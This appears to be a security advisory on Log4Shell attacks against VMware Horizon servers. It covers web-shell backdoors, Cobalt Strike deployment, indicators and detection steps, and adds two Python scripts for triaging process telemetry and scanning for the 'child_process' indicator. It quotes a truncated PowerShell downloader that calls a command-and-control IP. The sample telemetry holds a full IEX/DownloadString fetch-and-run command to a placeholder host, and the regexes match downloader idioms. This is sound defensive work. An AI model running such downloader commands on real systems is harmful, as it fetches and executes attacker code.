On January 5th, the UK's National Health Service (NHS) alerted that hackers were actively targeting Log4Shell vulnerabilities in VMware Horizon servers in an effort to establish persistent access via web shells. These web shells allow unauthenticated attackers to remotely execute commands on your server as NT AUTHORITY\SYSTEM (root privileges).

Based on Huntress' dataset of 180 Horizon servers, we've validated NHS' intel and discovered 10% of these systems (18) had been backdoored with a modified absg-worker.js web shell. According to Shodan, ~25,000 Horizon servers are currently internet accessible worldwide.

It's important to note that ~34% of the 180 Horizon servers (62) we analyzed were unpatched and internet facing at the time of this publication.

Our analysis of the web shells on these 18 compromised systems established a timeline that started in December and continued until December 29, 2021.

On January 14 at 1458 ET, an unrelated Managed Antivirus detection (Microsoft Defender) tipped our ThreatOps team to a Cobalt Strike implant. At 1518 ET another Managed Antivirus detection for Cobalt Strike on another host was identified. These two hosts were from two different partners, but the commonality was VMware Horizon server.

Additional security researchers including TheDFIRReport and Red Canary reported similar behavior around the same time, confirming a PowerShell-based downloader executed a Cobalt Strike payload that was configured to call back to 185.112.83.116 for command and control. The observed downloader:

```powershell
Iex ((New-Object ).DownloadString('116:8080/drv'))
```

At 1938 ET, we started deploying Huntress' soon-to-be-released Process Insights agent to all of the VMware Horizon servers we protect. This new EDR capability is based on an acquisition we made in early 2021 and allows us to proactively detect and respond to non-persistent malicious behavior by giving us the ability to collect detailed information about processes.

## Initial Access Source

Despite the prior mass exploitation of VMware Horizon to deliver web shells, our data suggests today's Cobalt Strike deployments were exploitation of Horizon itself and not the abuse of web shells. This conclusion is largely based on analysis of the PowerShell payload's parent process: web shell abuse spawns from node.exe, while exploitation of Log4Shell in Horizon spawns from ws_tomcatservice.exe.

## Detection Tips

For those of you just learning about the mass exploitation of VMware Horizon servers and the installation of backdoor web shells, you should seriously consider the possibility that your server is compromised if it was unpatched and internet-facing. We strongly suggest you perform the following actions:

- Run VMware's Horizon Mitigation tool to report whether there is a vulnerable Log4J library or child_process-based web shell present under the install location with the following command: `Horizon_Windows_Log4j_Mitigation.bat /verbose`.
- Manually inspect/assess the files within `%ProgramFiles%\VMware\VMware View\Server\appblastgateway\` for the presence of the child_process string as pictured.
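The parent-process distinction drawn under Initial Access Source (node.exe for web shell abuse, ws_tomcatservice.exe for direct Log4Shell exploitation of Horizon) can be turned into a triage rule over process-creation telemetry. The Python below is an added example, not Huntress' Process Insights logic or any VMware tooling. Every event, hostname and the C2 placeholder in it is constructed, and the downloader idioms it matches (IEX/Invoke-Expression, DownloadString, an encoded command) are assumptions of the example that go beyond the single payload the advisory quotes.

```python
"""Triage process-creation telemetry from VMware Horizon servers.

Added example, not Huntress' Process Insights logic. It applies the parent-process
distinction the advisory draws: a shell spawned by ws_tomcatservice.exe points at
direct Log4Shell exploitation of Horizon, one spawned by node.exe points at abuse
of a modified absg-worker.js web shell. All events below are constructed.
"""
import re
from dataclasses import dataclass

# Parent images named in the advisory, mapped to the initial-access path they imply.
SUSPECT_PARENTS = {
    "ws_tomcatservice.exe": "log4shell-exploitation",  # Horizon's Tomcat service
    "node.exe": "web-shell-abuse",                     # appblastgateway worker
}
# Only service binaries living under the Horizon install directory are of interest;
# an unrelated Node.js application elsewhere on the box must not trigger the rule.
HORIZON_PATH_MARKER = "\\vmware view\\"

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Command-line idioms of a stage-one PowerShell downloader (assumed patterns, not
# a list taken from the advisory).
DOWNLOADER_IDIOMS = {
    "iex": re.compile(r"\biex\b|invoke-expression", re.IGNORECASE),
    "downloadstring": re.compile(r"downloadstring", re.IGNORECASE),
    "encoded-command": re.compile(r"\s-e(nc|ncodedcommand)?\s", re.IGNORECASE),
}


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent_image: str   # full path of the parent process image
    image: str          # full path of the created process image
    command_line: str


@dataclass(frozen=True)
class Finding:
    host: str
    initial_access: str  # one of the SUSPECT_PARENTS values
    parent: str
    reason: str


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def triage(events):
    """Return one Finding per shell spawned by a Horizon service process."""
    findings = []
    for ev in events:
        parent = _basename(ev.parent_image)
        access = SUSPECT_PARENTS.get(parent)
        if access is None or HORIZON_PATH_MARKER not in ev.parent_image.lower():
            continue
        if _basename(ev.image) not in SHELLS:
            continue  # e.g. conhost.exe or a helper binary; outside this rule
        hits = [name for name, rx in DOWNLOADER_IDIOMS.items() if rx.search(ev.command_line)]
        if hits:
            reason = "shell with downloader idiom: " + ", ".join(hits)
        else:
            reason = "shell spawned by Horizon service"
        findings.append(Finding(ev.host, access, parent, reason))
    return findings


# Constructed telemetry (hostnames, paths and the C2 placeholder are made up).
HORIZON = "C:\\Program Files\\VMware\\VMware View\\Server"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent("horizon-01", HORIZON + "\\bin\\ws_tomcatservice.exe", PS,
              "powershell.exe -nop -w hidden -c \"IEX ((New-Object Net.WebClient)"
              ".DownloadString('http://C2-PLACEHOLDER:8080/drv'))\""),
    ProcEvent("horizon-02", HORIZON + "\\appblastgateway\\node.exe",
              "C:\\Windows\\System32\\cmd.exe", "cmd.exe /c whoami"),
    ProcEvent("horizon-02", HORIZON + "\\appblastgateway\\node.exe", PS,
              "powershell.exe -nop -w hidden -enc <BASE64-PLACEHOLDER>"),
    ProcEvent("horizon-03", "C:\\Windows\\System32\\svchost.exe", PS,
              "powershell.exe -Command Get-Date"),          # benign parent: ignored
    ProcEvent("build-01", "C:\\nodeapps\\node.exe", PS,
              "powershell.exe -c iex 'Get-Date'"),          # non-Horizon node.exe: ignored
]


def sample_findings():
    return triage(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in sample_findings():
        print(f"{f.host}: {f.initial_access} via {f.parent}: {f.reason}")
```

The rule keys on the parent image plus its install path, so it stays quiet for the ordinary Node.js and PowerShell activity elsewhere on a host; the command-line idioms only raise the confidence of a finding and are not required for one, because neither Horizon service has a legitimate reason to start a shell.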
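A scripted version of the second detection step, as an added example that is neither VMware's Horizon Mitigation tool nor Huntress' tooling: it walks the appblastgateway directory named in the advisory, reports every JavaScript file containing the string child_process together with the line numbers, and records each file's SHA-256 so the hits can be compared against a clean install of the same Horizon build. The install path is the one the advisory gives; the demo directory tree and its file contents are constructed.

```python
"""Check Horizon's appblastgateway directory for the child_process indicator.

Added example, not VMware's mitigation tool or Huntress' tooling. It reports
JavaScript files containing child_process (with line numbers) and hashes each
file so results can be compared with a known-good install. Demo tree constructed.
"""
import hashlib
import os
import tempfile
from pathlib import Path

INDICATOR = b"child_process"  # the string the advisory says to look for
# Install location from the advisory; %ProgramFiles% is resolved on Windows.
DEFAULT_DIR = (Path(os.environ.get("ProgramFiles", r"C:\Program Files"))
               / "VMware" / "VMware View" / "Server" / "appblastgateway")


def scan_for_child_process(root, suffixes=(".js",)):
    """Return [(relative_path, line_number, line_text, sha256)] for every hit.

    Only files with the given suffixes are read, since the gateway's JS sources
    are where a modified absg-worker.js lives. A hit is an indicator, not a
    verdict: compare the hash with a clean install of the same build to decide.
    """
    root = Path(root)
    hits = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        if path.suffix.lower() not in suffixes:
            continue
        data = path.read_bytes()
        digest = hashlib.sha256(data).hexdigest()
        for lineno, line in enumerate(data.splitlines(), start=1):
            if INDICATOR in line:
                rel = path.relative_to(root).as_posix()
                hits.append((rel, lineno, line.decode("utf-8", "replace").strip(), digest))
    return hits


# Constructed stand-ins (not real Horizon files): a worker carrying the indicator
# line, a clean sibling, and a non-JS note the suffix filter must ignore.
SAMPLE_FILES = {
    "absg-worker.js": (b"'use strict';\n"
                       b"const http = require('http');\n"
                       b"// constructed indicator line, no shell logic\n"
                       b"const cp = require('child_process');\n"),
    "lib/absg-server.js": b"'use strict';\nconst http = require('http');\n",
    "NOTES.txt": b"child_process appears here but this file is not JavaScript\n",
}


def build_sample_tree(base):
    """Write SAMPLE_FILES under base and return base."""
    for rel, content in SAMPLE_FILES.items():
        p = Path(base) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(content)
    return base


def demo():
    """Scan a throwaway copy of the sample tree and return the hits."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_for_child_process(build_sample_tree(tmp))


if __name__ == "__main__":
    if DEFAULT_DIR.is_dir():
        results = scan_for_child_process(DEFAULT_DIR)   # real Horizon install
    else:
        results = demo()                                 # offline demonstration
    if not results:
        print("no child_process references found")
    for rel, lineno, text, digest in results:
        print(f"{rel}:{lineno}: {text}  sha256={digest}")
```

Run it as an administrator on the Horizon server so every file under the gateway directory is readable; the hash column is what lets you tell a modified absg-worker.js apart from whatever the installed build legitimately ships.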